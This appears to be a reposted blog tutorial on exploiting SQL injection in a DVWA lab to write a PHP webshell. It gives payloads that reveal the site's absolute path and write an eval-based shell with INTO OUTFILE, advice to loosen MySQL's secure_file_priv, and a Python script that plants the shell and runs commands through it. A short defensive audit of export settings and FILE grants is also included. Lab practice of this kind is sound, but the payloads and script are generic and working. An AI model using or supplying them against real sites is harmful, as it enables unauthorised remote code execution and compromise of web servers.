DVWA from injection to Getshell

Source: Internet
Author: User

Live your life well, and don't be too busy telling people what you're doing.

Recently, while reviewing what I have learned, I rebuilt a DVWA instance to pick up new ideas and wrote some simple scripts to practice writing code.

It is well known that SQL injection does serious harm. For any experienced tester who finds a usable injection point, the usual next steps, besides dumping the database, are to guess the administrator's username and password and upload a webshell through the admin backend. These steps do not always go smoothly, but that is the general process. All kinds of problems come up along the way, and I will share them once I have learned more.

Today we are talking about using a SQL injection vulnerability to write a webshell. What can we do when we find an injection bug but cannot find the admin backend? If the database account's permissions are broad enough, we can use the SQL injection to write a shell to the web site.

Prerequisites for writing Webshell:

1. SELECT ... INTO OUTFILE is available (file export is allowed)

2. We need to know the absolute path where the site is located

3. We have sufficient authority to

First we identify the injection point, and then we force the site to reveal its absolute path:

Enter 1' union select 'x','x' into outfile 'xx' -- in the input box. The invalid SQL statement makes the database raise an error, and the error message returns the absolute path.

Now that we have the absolute path of the site, the next step is to use the SQL injection to write the shell. Enter 1' union select "<?php @eval($_GET['cmd'])?>","Hello admin" into outfile 'C:\\phpstudy\\phptutorial\\WWW\\dvwa\\hello.php' in the input box (note that each separator is two "\"). Click Submit, then check whether the file was written successfully.

When we run select 'xx' into outfile 'xxxx/xx/xx' -- we may run into the following situation:

Workaround: open the my.ini file, add secure_file_priv="/" as the last line, and restart MySQL.
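The prerequisites listed earlier and the secure_file_priv setting above can also be checked from the defender's side. The following is an added example, not part of the original post: it takes the value of secure_file_priv and the output of SHOW GRANTS and reports whether SELECT ... INTO OUTFILE could reach the web root. The function names and the sample grant lines are constructed for illustration, and a secure_file_priv value without a drive letter is assumed to sit on the same drive as the web root.

```python
import ntpath
import re

GLOBAL_GRANT = re.compile(r"GRANT\s+(.*?)\s+ON\s+\*\.\*", re.I)

def has_file_privilege(grants):
    """True if a global (ON *.*) grant includes FILE or ALL PRIVILEGES."""
    for line in grants:
        m = GLOBAL_GRANT.search(line)
        if m:
            privs = {p.strip().upper() for p in m.group(1).split(",")}
            if privs & {"FILE", "ALL", "ALL PRIVILEGES"}:
                return True
    return False

def _split(path):
    # Windows-style comparison: case-insensitive, '/' and '\' equivalent.
    drive, tail = ntpath.splitdrive(ntpath.normcase(ntpath.normpath(path)))
    return drive, [p for p in tail.split("\\") if p]

def covers(base, target):
    """True if directory `base` is `target` or one of its ancestors."""
    bdrive, bparts = _split(base)
    tdrive, tparts = _split(target)
    if bdrive and tdrive and bdrive != tdrive:
        return False  # different drives can never contain each other
    return tparts[:len(bparts)] == bparts

def audit(secure_file_priv, grants, web_root):
    """Return findings; an empty list means INTO OUTFILE cannot reach web_root.

    secure_file_priv: None for NULL (export disabled), "" for no restriction,
    otherwise the only directory the server will export into.
    """
    if secure_file_priv is None or not has_file_privilege(grants):
        return []
    if secure_file_priv == "":
        return ["secure_file_priv is empty: exports are not confined to a directory"]
    if covers(secure_file_priv, web_root):
        return ["secure_file_priv %r contains the web root" % secure_file_priv]
    return []

# Constructed sample inputs (not taken from a real server).
WEB_ROOT = r"C:\phpstudy\phptutorial\WWW\dvwa"
ROOT_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION"]
APP_GRANTS = ["GRANT USAGE ON *.* TO 'dvwa'@'localhost'",
              "GRANT ALL PRIVILEGES ON `dvwa`.* TO 'dvwa'@'localhost'"]

if __name__ == "__main__":
    for sfp in ("/", "", "C:/mysql-exports", None):
        print(repr(sfp), audit(sfp, ROOT_GRANTS, WEB_ROOT), audit(sfp, APP_GRANTS, WEB_ROOT))
```

With the "/" value from the workaround, the audit flags the root account but not the application account that lacks the global FILE privilege. A dedicated export directory outside the web root, or NULL, clears the finding for both.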

==================== Attached: my own rough automation script ====================

# -*- coding: utf-8 -*-
import requests

# Request headers copied from a browser session logged in to the lab DVWA instance
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Cache-Control': 'max-age=0',
    'Connection': 'keep-alive',
    'Cookie': 'security=low; PHPSESSID=pie6uqttjqtnadq1b5dp8640u1',
    'Host': '192.168.86.129',
    'Referer': 'http://192.168.86.129/dvwa/security.php',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',
}

# URL of the injectable page, up to and including the value of the vulnerable parameter
url = input('URL: ')
print('=' * 15, 'Please wait, sir', '=' * 15)

# URL-encoded form of the payload shown above
payload = '%27+union+select+"<%3Fphp+%40eval%28%24_GET%5B%27cmd%27%5D%29%3F>"%2c"Hello+admin"+into+outfile+%27c%3a%5c%5cphpstudy%5c%5cphptutorial%5c%5cwww%5c%5cdvwa%5c%5chello.php%27+--+&Submit=Submit#'
requests.get(url + payload, headers=headers)

# Request the written file and look for the marker string from the second column
shell_url = 'http://192.168.86.129/dvwa/hello.php'
check = requests.get(shell_url, headers=headers)
if 'Hello' in check.text:
    print('Webshell has been written, the path is: ' + shell_url)
else:
    print('Write failed')

# Read one value for the cmd parameter and print the response
print('Go ahead, sir!')
cmd = input()
result = requests.get(shell_url + '?cmd=' + cmd, headers=headers)
print(result.text)

  

I am recording what I have learned in case I forget it. A little progress every day; let's encourage each other.
